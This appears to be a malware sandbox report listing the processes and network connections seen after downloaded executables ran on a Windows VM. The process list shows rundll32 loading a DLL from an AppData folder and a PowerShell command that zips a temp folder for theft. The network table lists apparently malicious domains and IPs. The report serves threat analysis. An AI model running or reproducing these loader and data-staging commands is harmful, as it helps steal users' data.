"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5660 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5156 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5768 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:8

C:\Users\Admin\Downloads\ClassicShell.exe

"C:\Users\Admin\Downloads\ClassicShell.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5848 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:8

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\5ebdeb3f981e75\clip64.dll, Main

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\5ebdeb3f981e75\clip64.dll, Main

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\904519900954_Desktop.zip' -CompressionLevel Optimal

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\5ebdeb3f981e75\clip64.dll, Main

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 908 -p 5548 -ip 5548

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5548 -s 1420

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\904519900954_Desktop.zip' -CompressionLevel Optimal

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\904519900954_Desktop.zip' -CompressionLevel Optimal

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 900 -p 5548 -ip 5548

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5548 -s 1496

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=1672 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=1156 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3372 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6036 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3760 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:8

C:\Users\Admin\Downloads\IconDance.exe

"C:\Users\Admin\Downloads\IconDance.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2384 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:2

C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE

"C:\Program Files\Microsoft Office\Root\VFS\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE" /verb open "C:\Users\Admin\Desktop\DebugConvertFrom.xml"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3720 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5984 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5808 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3320 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5816 --field-trial-handle=1916,i,13464087328459949305,5260613580420818921,131072 /prefetch:8

C:\Users\Admin\Downloads\DesktopPuzzle.exe

"C:\Users\Admin\Downloads\DesktopPuzzle.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 908 -p 5548 -ip 5548

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5548 -s 1036

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 920 -p 5548 -ip 5548

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5548 -s 728

Network

Country Destination Domain Proto
US 8.8.8.8:53 dl1.cbsistatic.com udp
US 8.8.8.8:53 download.cnet.com udp
US 151.101.1.91:443 download.cnet.com tcp
US 151.101.1.91:443 download.cnet.com tcp
US 151.101.1.91:443 download.cnet.com tcp
US 8.8.8.8:53 cdn.cohesionapps.com udp
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 91.1.101.151.in-addr.arpa udp
US 8.8.8.8:53 234.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 196.178.17.96.in-addr.arpa udp
GB 18.244.140.25:443 cdn.cohesionapps.com tcp
GB 18.244.140.25:443 cdn.cohesionapps.com tcp
US 8.8.8.8:53 c.go-mpulse.net udp
US 151.101.1.91:443 download.cnet.com tcp
GB 23.39.224.128:445 c.go-mpulse.net tcp
US 8.8.8.8:53 apps.identrust.com udp
US 8.8.8.8:53 232.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 25.140.244.18.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 6.39.156.108.in-addr.arpa udp
US 151.101.1.91:443 download.cnet.com tcp
US 151.101.1.91:443 download.cnet.com tcp
US 8.8.8.8:53 ingest.make.rvapps.io udp
US 3.211.199.134:443 ingest.make.rvapps.io tcp
US 3.211.199.134:443 ingest.make.rvapps.io tcp
GB 96.17.179.205:80 apps.identrust.com tcp
US 8.8.8.8:53 134.199.211.3.in-addr.arpa udp
US 8.8.8.8:53 205.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.178.4:443 www.google.com udp
GB 142.250.178.4:443 www.google.com tcp
US 3.211.199.134:443 ingest.make.rvapps.io tcp
US 8.8.8.8:53 4.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 c.go-mpulse.net udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 100.5.17.2.in-addr.arpa udp
US 8.8.8.8:53 119.110.54.20.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 3.213.58.216.in-addr.arpa udp
US 8.8.8.8:53 content-autofill.googleapis.com udp
GB 142.250.200.42:443 content-autofill.googleapis.com tcp
US 8.8.8.8:53 195.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 42.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 227.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 201.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
US 192.178.49.3:443 beacons.gcp.gvt2.com tcp
US 192.178.49.3:443 beacons.gcp.gvt2.com tcp
US 8.8.8.8:53 beacons.gvt2.com udp
GB 172.217.169.67:443 beacons.gvt2.com tcp
GB 172.217.169.67:443 beacons.gvt2.com tcp
GB 172.217.169.67:443 beacons.gvt2.com udp
US 8.8.8.8:53 3.49.178.192.in-addr.arpa udp
US 8.8.8.8:53 67.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 id.google.com udp
US 209.85.147.94:443 id.google.com tcp
US 8.8.8.8:53 i.ytimg.com udp
GB 216.58.213.22:443 i.ytimg.com tcp
GB 216.58.213.22:443 i.ytimg.com tcp
US 8.8.8.8:53 apis.google.com udp
GB 216.58.213.22:443 i.ytimg.com tcp
GB 216.58.213.14:443 apis.google.com tcp
US 8.8.8.8:53 94.147.85.209.in-addr.arpa udp
US 8.8.8.8:53 22.213.58.216.in-addr.arpa udp
US 8.8.8.8:53 14.213.58.216.in-addr.arpa udp
US 8.8.8.8:53 www.youtube.com udp
GB 142.250.200.14:443 www.youtube.com tcp
GB 142.250.200.14:443 www.youtube.com udp
GB 216.58.213.22:443 i.ytimg.com udp
US 8.8.8.8:53 14.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 googleads.g.doubleclick.net udp
US 8.8.8.8:53 static.doubleclick.net udp
GB 216.58.201.98:443 googleads.g.doubleclick.net tcp
GB 142.250.178.6:443 static.doubleclick.net tcp
US 8.8.8.8:53 jnn-pa.googleapis.com udp
GB 172.217.169.74:443 jnn-pa.googleapis.com udp
GB 216.58.201.98:443 googleads.g.doubleclick.net udp
US 8.8.8.8:53 6.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 98.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 74.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 66.204.58.216.in-addr.arpa udp
US 192.178.49.3:443 beacons.gcp.gvt2.com udp
US 8.8.8.8:53 play.google.com udp
GB 142.250.200.46:443 play.google.com tcp
GB 142.250.200.46:443 play.google.com udp
US 8.8.8.8:53 46.200.250.142.in-addr.arpa udp
US 192.178.49.3:443 beacons.gcp.gvt2.com udp
US 8.8.8.8:53 github.com udp
DE 140.82.121.4:443 github.com tcp
DE 140.82.121.4:443 github.com tcp
US 8.8.8.8:53 github.githubassets.com udp
US 8.8.8.8:53 avatars.githubusercontent.com udp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 185.199.108.133:443 avatars.githubusercontent.com tcp
US 8.8.8.8:53 github-cloud.s3.amazonaws.com udp
US 8.8.8.8:53 user-images.githubusercontent.com udp
US 8.8.8.8:53 4.121.82.140.in-addr.arpa udp
US 8.8.8.8:53 154.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 repository-images.githubusercontent.com udp
US 185.199.110.133:443 repository-images.githubusercontent.com tcp
US 185.199.110.133:443 repository-images.githubusercontent.com tcp
US 185.199.110.133:443 repository-images.githubusercontent.com tcp
US 185.199.110.133:443 repository-images.githubusercontent.com tcp
US 185.199.110.133:443 repository-images.githubusercontent.com tcp
GB 142.250.200.42:443 jnn-pa.googleapis.com udp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 collector.github.com udp
US 185.199.109.154:443 github.githubassets.com tcp
US 8.8.8.8:53 api.github.com udp
US 140.82.114.22:443 collector.github.com tcp
US 140.82.114.22:443 collector.github.com tcp
DE 140.82.121.6:443 api.github.com tcp
US 8.8.8.8:53 6.121.82.140.in-addr.arpa udp
US 8.8.8.8:53 22.114.82.140.in-addr.arpa udp
US 8.8.8.8:53 170.117.168.52.in-addr.arpa udp
US 8.8.8.8:53 google.com udp
GB 216.58.201.110:443 google.com tcp
US 8.8.8.8:53 e2c16.gcp.gvt2.com udp
DE 34.89.141.94:443 e2c16.gcp.gvt2.com tcp
US 8.8.8.8:53 110.201.58.216.in-addr.arpa udp
US 8.8.8.8:53 private-user-images.githubusercontent.com udp
US 8.8.8.8:53 camo.githubusercontent.com udp
GB 172.217.169.67:443 beacons.gvt2.com udp
US 8.8.8.8:53 beacons4.gvt2.com udp
US 216.239.32.116:443 beacons4.gvt2.com tcp
US 216.239.32.116:443 beacons4.gvt2.com udp
US 8.8.8.8:53 94.141.89.34.in-addr.arpa udp
US 8.8.8.8:53 116.32.239.216.in-addr.arpa udp
US 8.8.8.8:53 bit.ly udp
US 67.199.248.11:443 bit.ly tcp
US 67.199.248.11:443 bit.ly tcp
US 67.199.248.11:443 bit.ly udp
US 8.8.8.8:53 11.248.199.67.in-addr.arpa udp
US 8.8.8.8:53 238.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 github-cloud.s3.amazonaws.com udp
US 192.178.49.3:443 beacons.gcp.gvt2.com udp
US 8.8.8.8:53 e2c39.gcp.gvt2.com udp
FI 35.217.17.196:443 e2c39.gcp.gvt2.com tcp
US 8.8.8.8:53 196.17.217.35.in-addr.arpa udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
GB 172.217.169.74:443 chromewebstore.googleapis.com tcp
DE 140.82.121.3:443 github.com tcp
GB 172.217.169.67:443 beacons.gvt2.com udp
US 8.8.8.8:53 e2c14.gcp.gvt2.com udp
BE 35.240.1.200:443 e2c14.gcp.gvt2.com tcp
US 8.8.8.8:53 beacons2.gvt2.com udp
AU 142.250.66.227:443 beacons2.gvt2.com tcp
AU 142.250.66.227:443 beacons2.gvt2.com tcp
US 8.8.8.8:53 3.121.82.140.in-addr.arpa udp
US 8.8.8.8:53 200.1.240.35.in-addr.arpa udp
US 8.8.8.8:53 e2c15.gcp.gvt2.com udp
GB 34.105.225.79:443 e2c15.gcp.gvt2.com tcp
US 8.8.8.8:53 227.66.250.142.in-addr.arpa udp
US 8.8.8.8:53 79.225.105.34.in-addr.arpa udp
US 8.8.8.8:53 beacons3.gvt2.com udp
GB 216.58.201.110:443 google.com udp
US 8.8.8.8:53 pvgbv.gorda.site udp
US 188.114.96.2:443 pvgbv.gorda.site tcp
US 188.114.96.2:443 pvgbv.gorda.site tcp
US 8.8.8.8:53 gorda.site udp
US 8.8.8.8:53 vpngets.org udp
US 188.114.97.2:443 vpngets.org tcp
US 8.8.8.8:53 vpngets.com udp
US 172.67.131.227:443 vpngets.com tcp
US 8.8.8.8:53 neo.tildacdn.com udp
US 172.67.131.227:443 vpngets.com udp
US 8.8.8.8:53 2.96.114.188.in-addr.arpa udp
US 8.8.8.8:53 2.97.114.188.in-addr.arpa udp
US 8.8.8.8:53 ws.tildacdn.com udp
DE 162.55.188.142:443 neo.tildacdn.com tcp
US 8.8.8.8:53 bitbucket.org udp
AU 104.192.141.1:443 bitbucket.org tcp
US 8.8.8.8:53 227.131.67.172.in-addr.arpa udp
US 8.8.8.8:53 142.188.55.162.in-addr.arpa udp
US 8.8.8.8:53 10.180.250.142.in-addr.arpa udp
AU 104.192.141.1:443 bitbucket.org tcp
US 8.8.8.8:53 1.141.192.104.in-addr.arpa udp
US 8.8.8.8:53 bbuseruploads.s3.amazonaws.com udp
US 52.217.227.65:443 bbuseruploads.s3.amazonaws.com tcp
US 52.217.227.65:443 bbuseruploads.s3.amazonaws.com tcp
US 8.8.8.8:53 65.227.217.52.in-addr.arpa udp
US 8.8.8.8:53 stat.tildacdn.com udp
GB 193.3.17.197:443 stat.tildacdn.com tcp
US 8.8.8.8:53 197.17.3.193.in-addr.arpa udp
US 188.114.96.2:443 vpngets.org udp
US 188.114.97.2:443 vpngets.org udp
US 8.8.8.8:53 voloz.site udp
US 172.67.145.170:443 voloz.site tcp
US 8.8.8.8:53 vpnsget.pw udp
US 172.67.165.66:443 vpnsget.pw tcp
US 8.8.8.8:53 170.145.67.172.in-addr.arpa udp
US 8.8.8.8:53 66.165.67.172.in-addr.arpa udp
AU 142.250.66.227:443 beacons2.gvt2.com udp
US 192.178.49.3:443 beacons.gcp.gvt2.com udp
US 8.8.8.8:53 apexgenz.com udp
NL 185.14.29.199:80 apexgenz.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 216.239.32.116:443 beacons4.gvt2.com udp
US 8.8.8.8:53 199.29.14.185.in-addr.arpa udp
NL 185.14.29.199:80 apexgenz.com tcp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 github.com udp
DE 140.82.121.3:443 github.com tcp
US 8.8.8.8:53 user-images.githubusercontent.com udp
US 8.8.8.8:53 collector.github.com udp
US 140.82.113.21:443 collector.github.com tcp
US 8.8.8.8:53 api.github.com udp
DE 140.82.121.6:443 api.github.com tcp
US 8.8.8.8:53 21.113.82.140.in-addr.arpa udp
NL 185.14.29.199:80 apexgenz.com tcp
US 185.199.108.133:443 user-images.githubusercontent.com tcp
US 216.239.32.116:443 beacons4.gvt2.com udp
US 8.8.8.8:53 keyactivators.net udp
US 173.252.167.210:443 keyactivators.net tcp
US 173.252.167.210:443 keyactivators.net tcp
US 173.252.167.210:443 keyactivators.net tcp
US 8.8.8.8:53 210.167.252.173.in-addr.arpa udp
US 8.8.8.8:53 moduls.su udp
US 173.252.167.210:443 keyactivators.net udp
US 8.8.8.8:53 stats.wp.com udp
US 188.114.97.2:80 moduls.su tcp
US 8.8.8.8:53 modules.su udp
US 172.67.128.47:80 modules.su tcp
US 192.0.76.3:443 stats.wp.com tcp
NL 62.133.61.7:3333 tcp
US 8.8.8.8:53 pixel.wp.com udp
US 8.8.8.8:53 content-autofill.googleapis.com udp
GB 142.250.187.234:443 content-autofill.googleapis.com udp
US 8.8.8.8:53 47.128.67.172.in-addr.arpa udp
US 8.8.8.8:53 3.76.0.192.in-addr.arpa udp
US 8.8.8.8:53 7.61.133.62.in-addr.arpa udp
US 8.8.8.8:53 234.187.250.142.in-addr.arpa udp
US 192.0.76.3:443 pixel.wp.com udp
NL 89.23.103.42:80 tcp
NL 45.159.189.140:80 tcp
IT 185.196.10.188:80 185.196.10.188 tcp
US 8.8.8.8:53 fellzobr.com udp
NL 185.14.29.199:80 fellzobr.com tcp
US 8.8.8.8:53 188.10.196.185.in-addr.arpa udp
US 8.8.8.8:53 download.alloutpest.com.sg udp
SG 23.106.127.3:443 download.alloutpest.com.sg tcp
SG 23.106.127.3:443 download.alloutpest.com.sg tcp
SG 23.106.127.3:443 download.alloutpest.com.sg tcp
US 8.8.8.8:53 3.127.106.23.in-addr.arpa udp
IT 185.196.10.188:80 185.196.10.188 tcp
NL 89.23.103.42:80 tcp
US 8.8.8.8:53 qsrc.sg udp
SG 43.229.84.147:443 qsrc.sg tcp
SG 43.229.84.147:443 qsrc.sg tcp
US 8.8.8.8:53 147.84.229.43.in-addr.arpa udp
NL 45.159.189.140:80 tcp
NL 89.23.103.42:80 tcp
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
IT 185.196.10.188:80 185.196.10.188 tcp
NL 89.23.103.42:80 tcp
US 188.114.97.2:80 moduls.su tcp
US 172.67.128.47:80 modules.su tcp
NL 62.133.61.7:3333 tcp
IT 185.196.10.188:80 185.196.10.188 tcp
NL 45.159.189.140:80 tcp
US 8.8.8.8:53 nw-umwatson.events.data.microsoft.com udp
US 20.42.65.92:443 nw-umwatson.events.data.microsoft.com tcp
US 8.8.8.8:53 92.65.42.20.in-addr.arpa udp
NL 89.23.103.42:80 tcp
SG 23.106.127.3:443 download.alloutpest.com.sg tcp
IT 185.196.10.188:80 185.196.10.188 tcp
NL 89.23.103.42:80 tcp
US 8.8.8.8:53 noxplayer.org udp
US 104.21.23.60:443 noxplayer.org tcp
US 8.8.8.8:53 60.23.21.104.in-addr.arpa udp
US 104.21.23.60:443 noxplayer.org udp
NL 45.159.189.140:80 tcp
IT 185.196.10.188:80 185.196.10.188 tcp
NL 89.23.103.42:80 tcp
NL 45.159.189.140:80 tcp
IT 185.196.10.188:80 185.196.10.188 tcp
NL 89.23.103.42:80 tcp
NL 89.23.103.42:80 tcp
NL 45.159.189.140:80 tcp
NL 45.159.189.140:80 tcp
NL 89.23.103.42:80 tcp
NL 45.159.189.140:80 tcp
NL 89.23.103.42:80 tcp
NL 45.159.189.140:80 tcp
US 188.114.97.2:80 moduls.su tcp
US 172.67.128.47:80 modules.su tcp
NL 45.159.189.140:80 tcp
NL 45.159.189.140:80 tcp
US 8.8.8.8:53 www.google.com udp
GB 142.250.178.4:443 www.google.com udp
GB 142.250.178.4:443 www.google.com tcp
US 8.8.8.8:53 www.win-rar.com udp
DE 51.195.68.163:443 www.win-rar.com tcp
US 8.8.8.8:53 id.google.com udp
US 8.8.8.8:53 163.68.195.51.in-addr.arpa udp
US 8.8.8.8:53 content-autofill.googleapis.com udp
GB 142.250.178.10:443 content-autofill.googleapis.com udp
GB 142.250.178.10:443 content-autofill.googleapis.com tcp
US 172.253.123.94:443 id.google.com udp
US 8.8.8.8:53 10.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 94.123.253.172.in-addr.arpa udp
US 8.8.8.8:53 226.179.250.142.in-addr.arpa udp
DE 51.195.68.163:443 www.win-rar.com tcp
DE 51.195.68.163:443 www.win-rar.com tcp
US 188.114.97.2:80 moduls.su tcp
US 172.67.128.47:80 modules.su tcp
DE 51.195.68.163:443 www.win-rar.com tcp
DE 51.195.68.163:443 www.win-rar.com tcp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
US 192.178.49.3:443 beacons.gcp.gvt2.com udp
US 192.178.49.3:443 beacons.gcp.gvt2.com tcp
IT 185.196.10.188:80 185.196.10.188 tcp
US 188.114.97.2:80 moduls.su tcp
US 172.67.128.47:80 modules.su tcp
NL 45.159.189.140:80 tcp
NL 89.23.103.42:80 tcp
NL 89.23.103.42:80 tcp
NL 45.159.189.140:80 tcp
US 188.114.97.2:80 moduls.su tcp
US 172.67.128.47:80 modules.su tcp
US 8.8.8.8:53 VocespJXXrvzFbcXoyMlQ.VocespJXXrvzFbcXoyMlQ udp
US 8.8.8.8:53 moduls.su udp
US 172.67.141.128:80 moduls.su tcp
US 8.8.8.8:53 modules.su udp
US 172.67.128.47:80 modules.su tcp
US 8.8.8.8:53 128.141.67.172.in-addr.arpa udp
US 8.8.8.8:53 business.bing.com udp
US 8.8.8.8:53 business.bing.com udp
US 8.8.8.8:53 nav-edge.smartscreen.microsoft.com udp
US 8.8.8.8:53 nav-edge.smartscreen.microsoft.com udp
US 13.107.6.158:443 business.bing.com tcp
GB 172.165.69.228:443 nav-edge.smartscreen.microsoft.com tcp
GB 172.165.69.228:443 nav-edge.smartscreen.microsoft.com tcp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 www.microsoft.com udp
GB 2.17.5.133:443 www.microsoft.com tcp
US 8.8.8.8:53 bzib.nelreports.net udp
US 8.8.8.8:53 bzib.nelreports.net udp
GB 88.221.135.81:443 bzib.nelreports.net tcp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 228.69.165.172.in-addr.arpa udp
US 8.8.8.8:53 133.5.17.2.in-addr.arpa udp
US 8.8.8.8:53 81.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 c.s-microsoft.com udp
US 8.8.8.8:53 c.s-microsoft.com udp
US 8.8.8.8:53 edgestatic.azureedge.net udp
US 8.8.8.8:53 edgestatic.azureedge.net udp
US 13.107.246.64:443 edgestatic.azureedge.net tcp
US 13.107.246.64:443 edgestatic.azureedge.net tcp
US 13.107.246.64:443 edgestatic.azureedge.net tcp
US 13.107.246.64:443 edgestatic.azureedge.net tcp
US 13.107.246.64:443 edgestatic.azureedge.net tcp
US 13.107.246.64:443 edgestatic.azureedge.net tcp
US 13.107.246.64:443 edgestatic.azureedge.net tcp
US 8.8.8.8:53 wcpstatic.microsoft.com udp
US 8.8.8.8:53 wcpstatic.microsoft.com udp
US 13.107.246.64:443 wcpstatic.microsoft.com tcp
GB 2.17.5.133:443 www.microsoft.com tcp
US 13.107.246.64:443 wcpstatic.microsoft.com tcp
GB 92.123.128.164:443 www.bing.com tcp
US 8.8.8.8:53 164.128.123.92.in-addr.arpa udp
GB 92.123.128.164:443 www.bing.com udp
GB 92.123.128.164:443 www.bing.com tcp
US 8.8.8.8:53 bmten10vt.top udp
RU 85.193.82.4:80 bmten10vt.top tcp
GB 92.123.128.164:443 www.bing.com tcp
GB 92.123.128.164:443 www.bing.com tcp
US 8.8.8.8:53 4.82.193.85.in-addr.arpa udp
US 8.8.8.8:53 r.bing.com udp
US 8.8.8.8:53 r.bing.com udp
US 8.8.8.8:53 th.bing.com udp
US 8.8.8.8:53 th.bing.com udp
GB 92.123.128.152:443 r.bing.com tcp
GB 92.123.128.152:443 r.bing.com tcp
GB 92.123.128.146:443 th.bing.com tcp
GB 92.123.128.146:443 th.bing.com tcp
GB 92.123.128.152:443 r.bing.com udp
GB 92.123.128.152:443 r.bing.com udp
GB 92.123.128.146:443 th.bing.com udp
US 8.8.8.8:53 152.128.123.92.in-addr.arpa udp
US 8.8.8.8:53 146.128.123.92.in-addr.arpa udp
RU 85.193.82.4:80 bmten10vt.top tcp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 github.com udp
DE 140.82.121.4:443 github.com tcp
GB 172.165.69.228:443 nav-edge.smartscreen.microsoft.com tcp
DE 140.82.121.4:443 github.com tcp
US 8.8.8.8:53 github.githubassets.com udp
US 8.8.8.8:53 github.githubassets.com udp
US 8.8.8.8:53 avatars.githubusercontent.com udp
US 8.8.8.8:53 avatars.githubusercontent.com udp
US 185.199.110.133:443 avatars.githubusercontent.com tcp
US 185.199.109.154:443 github.githubassets.com tcp
US 8.8.8.8:53 user-images.githubusercontent.com udp
US 8.8.8.8:53 user-images.githubusercontent.com udp
